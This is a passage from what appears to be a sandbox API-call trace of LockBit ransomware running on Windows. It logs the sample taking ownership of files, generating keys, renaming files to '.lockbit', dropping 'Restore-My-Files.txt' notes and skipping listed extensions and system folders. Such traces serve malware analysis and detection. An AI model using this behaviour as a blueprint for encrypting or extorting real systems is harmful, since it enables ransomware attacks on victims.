(in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.166] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.166] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.167] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.167] CloseHandle (hObject=0x1e8) returned 1 [0095.168] free (_Block=0x77d800) [0095.168] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1e8 [0095.168] CreateIoCompletionPort (FileHandle=0x1e8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.168] malloc (_Size=0x40068) returned 0x1ff1e60 [0095.168] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=61220) returned 1 [0095.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0095.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0095.190] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0095.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.252] malloc (_Size=0xc8) returned 0x3ef0008 [0095.252] NtSetInformationFile (FileHandle=0x1e8, IoStatusBlock=0x3d6aa8c, FileInformation=0x3ef0008, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0095.252] free (_Block=0x3ef0008) [0095.253] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0095.253] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0095.253] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.253] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 1 [0095.253] lstrcmpiW (lpString1=".", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.253] lstrcmpiW (lpString1="..", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.253] PathFindExtensionW (pszPath="TravelIntroToMain_PAL.wmv") returned=".wmv" [0095.253] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0095.253] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0095.254] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0095.254] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0095.255] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="ntldr", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="bootsect.bak", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="autorun.inf", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="thumbs.db", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.255] lstrcmpiW (lpString1="iconcache.db", lpString2="TravelIntroToMain_PAL.wmv") returned -1 [0095.256] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0095.256] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv") returned=".wmv" [0095.256] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0095.256] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0095.256] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0095.257] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0095.257] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv.lockbit") returned 85 [0095.257] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.270] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.272] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.272] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.274] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.275] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.275] RtlFreeAnsiString (AnsiString="\\") [0095.276] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x330) returned 0x0 [0095.276] malloc (_Size=0x200) returned 0x77d800 [0095.276] NtQueryInformationToken (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.276] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.276] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.276] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.277] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.277] CloseHandle (hObject=0x330) returned 1 [0095.277] free (_Block=0x77d800) [0095.277] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0095.278] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.278] malloc (_Size=0x40068) returned 0x3d70048 [0095.280] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=229220) returned 1 [0095.280] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0095.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0095.287] ReadFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0095.289] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.289] malloc (_Size=0xc0) returned 0x3ef0008 [0095.289] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6aa8c, FileInformation=0x3ef0008, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0095.290] free (_Block=0x3ef0008) [0095.290] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0095.290] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0095.290] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.291] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 0 [0095.291] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0095.291] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="VideoWall", cAlternateFileName="VIDEOW~1")) returned 1 [0095.291] lstrcmpiW (lpString1=".", lpString2="VideoWall") returned -1 [0095.291] lstrcmpiW (lpString1="..", lpString2="VideoWall") returned -1 [0095.291] lstrcmpiW (lpString1="VideoWall", lpString2="$windows.~bt") returned 1 [0095.291] lstrcmpiW (lpString1="VideoWall", lpString2="intel") returned 1 [0095.291] lstrcmpiW (lpString1="VideoWall", lpString2="msocache") returned 1 [0095.291] lstrcmpiW (lpString1="VideoWall", lpString2="$recycle.bin") returned 1 [0095.291] lstrcmpiW (lpString1="VideoWall", lpString2="$windows.~ws") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="tor browser") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="boot") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="system volume information") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="perflogs") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="google") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="application data") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="windows") returned -1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="windows.old") returned -1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="appdata") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Windows nt") returned -1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Msbuild") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Microsoft") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="All users") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="mozilla") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Microsoft.NET") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="microsoft shared") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Internet Explorer") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="common files") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="opera") returned 1 [0095.292] lstrcmpiW (lpString1="VideoWall", lpString2="Windows Journal") returned -1 [0095.292] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 54 [0095.292] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*") returned 56 [0095.292] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0095.293] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0095.293] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.293] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0095.293] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0095.293] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2a3ff0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2a3ff0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0095.293] lstrcmpiW (lpString1=".", lpString2="203x8subpicture.png") returned -1 [0095.293] lstrcmpiW (lpString1="..", lpString2="203x8subpicture.png") returned -1 [0095.293] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0095.293] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0095.293] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0095.293] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0095.294] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0095.294] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0095.294] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0095.294] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0095.294] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0095.295] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0095.295] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="203x8subpicture.png") returned 1 [0095.295] lstrcmpiW (lpString1="ntldr", lpString2="203x8subpicture.png") returned 1 [0095.295] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="203x8subpicture.png") returned 1 [0095.295] lstrcmpiW (lpString1="bootsect.bak", lpString2="203x8subpicture.png") returned 1 [0095.296] lstrcmpiW (lpString1="autorun.inf", lpString2="203x8subpicture.png") returned 1 [0095.296] lstrcmpiW (lpString1="thumbs.db", lpString2="203x8subpicture.png") returned 1 [0095.296] lstrcmpiW (lpString1="iconcache.db", lpString2="203x8subpicture.png") returned 1 [0095.296] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\") returned="" [0095.296] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png") returned=".png" [0095.296] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0095.296] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0095.296] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".ckp", lpString2=".png") 